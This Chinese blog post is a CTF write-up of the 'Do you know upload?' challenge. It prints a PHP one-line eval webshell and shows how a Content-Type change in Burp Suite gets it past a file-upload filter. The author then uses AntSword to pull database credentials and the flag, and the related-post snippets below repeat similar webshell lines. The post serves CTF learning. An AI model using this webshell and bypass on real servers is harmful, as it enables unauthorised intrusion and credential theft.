第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?

于 2020-11-18 22:19:01 发布
阅读量440 收藏
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45569969/article/details/109788703
版权

打开之后很明显是个文件上传漏洞

当然也有可能是我层次太低看不出来还有哈别的可能
在这里插入图片描述
f12后也证明了这一点
在这里插入图片描述
虽然好像和这个include没有什么关系

尝试传一句话木马

之前做过一个带过滤的一句话木马,那个题忘记了,就想着继续按照上次的传,之后发现好像不太行,就换回了最简单的一句话木马

<?php eval($_POST['a']); ?>

上传后提示不支持此类文件格式,之后开始用bp抓包改类型
在这里插入图片描述

把里面的Type改为:image/jpeg

在这里插入图片描述
上传就成功了
或者先把一句话格式改为jpg,抓包时再改回php也可以

用蚁剑连接

一定要记得连接传文件后的页面!!!
比如我传的文件叫file,那么连接的地址就是url/upload/file
连接成功之后就可以里面的内容了,发现并没有flag,但是在config里面发现了数据库的账号密码,之后用蚁剑连接数据库

用蚁剑连接数据库

对着url右键点数据操作
在这里插入图片描述
之后在左上方点击添加,把数据库账号密码输进去连接,之后记得执行一下查询语句,就得到flag了
在这里插入图片描述

Naptmn
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
rick_know_rules_The_DoYou_you_
09-30
and so do i
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
php代码-ctf payload 第九题 反序列化 do you know robot
福建省南安市石井镇厚德中学九年级英语上册 Unit 4 Topic 3 What do you know about Mars
08-19
福建省南安市石井镇厚德中学九年级英语上册 Unit 4 Topic 3 What do you know about Mars Section B导学案(无答案)(新版)仁爱版
信息安全_数据安全_Its 10pm do you know where your .pdf
08-22
信息安全_数据安全_Its 10pm do you know where your 定向攻击 安全对抗 情报处理 数据安全 数据脱敏
2018“百越”第四福建省高校网络空间安全大赛部分题目writeup
You
12-02 5704
2018“百越”第四福建省高校网络空间安全大赛writeup 0x00题目存档: 链接: https://pan.baidu.com/s/1v59VfheEC5XY8vyKvgEX3Q 提取码: bbfi 0x01题目名称:签到 操作内容: Step 0:题目信息 Step 1:九乘九矩阵加密分析 莫名其妙就想到了矩阵加密,百度搜了半天的解密方法也没找到…还好队友做出来了,不然肯定会在这个题...
第三届百越福建省高校网络空间安全大赛-Do you know upload?-WP
会下雪的晴天
07-17 861
上传绕过,菜刀连接数据库 题目描述 解题思路 写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话: <?php @eval($_POST['caidao']);?> 上传,抓包 jpg改为php,GOGOGO发包 得到上传路径,用菜刀链接 进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码 菜刀连接,配置一下 <T&g...
第三届百越福建省高校网络空间安全大赛 Do you know upload
feng的博客
09-10 631
这是涉及文件上传和蚁剑连数据库的一个题目
第三届百越福建省高校网络空间安全大赛Do you know upload?Writeup
驻足
04-21 3805
推一波我的博客 Marsguest’s Blog 第三届百越福建省高校网络空间安全大赛Do you know upload?Writeup 首先,直接上传一句话木马1.php文件 &lt;?php eval($_POST['cmd']);?&gt; //文件内容 发现如图弹窗 初步判断是前台直接判断文件类型,这种绕过相对简单,更改传输时文件类型即可 再次上传1.php的...
第三届百越福建省高校网络空间安全大赛------------Do you know upload
大方子
08-30 709
========================== 个人收获 1.通过修改文件类型绕过上传限制   ========================= 题目:   查看源码有一个提示信息 上传图片正常,上传其他的文件会出现 典型的上传绕过,这里就只需要把文件类型content-type字段改为image/gif(在上传其他文件的时候) 然后我们上传普通的php一句...
i春秋练习——第三届百越福建省高校网络空间安全大赛-web-do you know upload
wuerror的博客
01-07 544
首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?> burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。 显示上传成功 接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...
第三届百越福建省高校网络空间安全大赛——WEB-Do you know upload
Ifish的博客
04-07 1137
打开链接,发现是文件上传题,所以就先按正常套路来burpsuite抓包改文件类型上传成功菜刀连上以后在config文件中得到用户名和密码得到flag这道题有很多种做法,我就不一一列举了,总之是很基础的题了...
第三届百越福建省高校网络空间安全大赛writeup--Do you know upload
weixin_30586257的博客
07-14 216
一打开网址,可以看出应该是文件上传漏洞,查看源码,也有可能是文件包含 上传个图片,成功,然后上传一句话木马 通过bp进行上传绕过 , 开始菜刀连接http://e00b6eca3c9c4e14a31cf6ce409fab9006d33f25aeda472e.game.ichunqiu.com/upload/2.php,密码为a 发现有ctf.sql,but打不开,所以用...
ctf-wp-第三届百越福建省高校网络空间安全大赛 Do you know upload
key_nothing的博客
09-28 1275
考察:文件上传漏洞、数据库基本操作 访问url :只能上传图片文件 试着上传大马,burp抓包: 尝试修改文件类型为:image/jpeg 结果上传成功: 访问大马: 发现有个ctf.sql 。flag应该在数据库中,看看config.php,找到数据库连接方法: 执行一下sql语句:看看都有那些表 存在flag表,看看内容: bingo ...
Web–Do you know upload?[i春秋][100pt]
Laurel_60的博客
08-01 1016
首先,题目要求我们上传一个图片文件。 让我传什么我就传什么,那我岂不是很没面子?上传一句话木马php文件试试。 那就先以图片的格式上传,然后用burp抓包,再把文件格式改为.php。 PS:有些解法是上传的php格式,然后在burp中把Content-Type...
第三届百越福建省高校网络空间安全大赛
andiao1218的博客
03-21 643
Upload: 选择jpg后缀的一句话木马,burp开启抓包,点击Submit上传 把jpg改为php,发包,在返回包里看到马的地址 用菜刀连接 这里有个ctf.sql,但是里面没有东西,flag可能在数据库里,打开config.php 得到数据库名称ctf,账号ctf,密码ctfctfctf 上大马 登陆mysql数据库 选择...
i春秋-第三届百越福建省高校网络空间安全大赛
qq_44858189的博客
07-29 2194
i春秋-第三届百越福建省高校网络空间安全大赛文件上传利用菜刀连接数据库 记录一下i春秋里的一道web题,题目类型是文件上传漏洞 传送门:https://www.ichunqiu.com/battalion?t=1&r=61025 主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈 文件上传 来到上传点 先上传一个正常的.jpg文件(图片中写入一句话木马) <?php eval($_POST['a']) ;?> 然后打开burp suite抓包,把后缀名jpg修改成php
CTF-"第三届百越福建省高校网络空间安全大赛":Do you know upload
路漫漫其修远
08-03 184
分值:100分 类型:Web题目名称:Do you know upload? 题目内容:https://www.ichunqiu.com/battalion?t=1&r=0 知识点 使用BurpSuite绕过上传文件格式校验 使用中国菜刀连接一句话???? 操作流程 打开页面,是个上传界面.直接上传php一句话,提示文件类型不允许. 上传一句话.jpg,提交时使用Burpsuite...
i春秋Do you know upload
weixin_30701575的博客
09-04 300
打开题目是一个文件上传,就先写了一个一句话木马的php文件,直接提交显示文件类型不允许。于是乎将其改为jpeg格式上传,成功了,但是没用,菜刀连不上。再次上传jpg格式的一句话木马(写好php木马后将后缀改为jpeg),然后抓包,将请求栏中的jpeg改为php,go一遍,上传成功的提示 提示上传成功并得到位置 使用菜刀链接上 ...
Do you know LaMDA?
最新发布
03-31
Yes, as an AI language model, I am aware of LaMDA. It stands for "Language Model for Dialogue Applications" and is a new conversational AI technology developed by Google. It uses machine learning to ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值